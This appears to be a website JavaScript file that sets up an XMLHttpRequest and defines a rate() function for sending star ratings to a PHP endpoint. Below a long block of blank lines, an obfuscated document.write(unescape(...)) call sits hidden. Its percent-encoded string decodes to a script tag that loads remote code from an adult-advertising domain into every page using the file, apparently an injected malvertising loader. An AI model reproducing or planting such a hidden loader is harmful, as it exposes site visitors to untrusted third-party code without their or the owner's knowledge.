var xmlhttp=false;
/*@cc_on @*/
/*@if (@_jscript_version >= 5)
 try {
  xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
 } catch (e) {
  try {
   xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  } catch (E) {
   xmlhttp = false;
  }
 }
@end @*/
if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
	try {
		xmlhttp = new XMLHttpRequest();
	} catch (e) {
		xmlhttp=false;
	}
}
if (!xmlhttp && window.createRequest) {
	try {
		xmlhttp = window.createRequest();
	} catch (e) {
		xmlhttp=false;
	}
}

function rate(id,r,t) {
 xmlhttp.open("GET", "/ratings.php?id="+id+"&rating="+r+"&type="+t,true);
 xmlhttp.onreadystatechange=function() {
  if (xmlhttp.readyState==4) {
   document.getElementById('rated'+id).innerHTML = xmlhttp.responseText
  }
 }
 xmlhttp.send(null)
}










































document.write( unescape( '%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%63%68%61%72%73%65%74%3D%22%75%74%66%2D%38%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%73%70%61%63%65%73%2E%65%72%6F%2D%61%64%76%65%72%74%69%73%69%6E%67%73%2E%63%6F%6D%2F%61%64%73%70%61%63%65%2F%38%30%31%32%38%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B' ) );

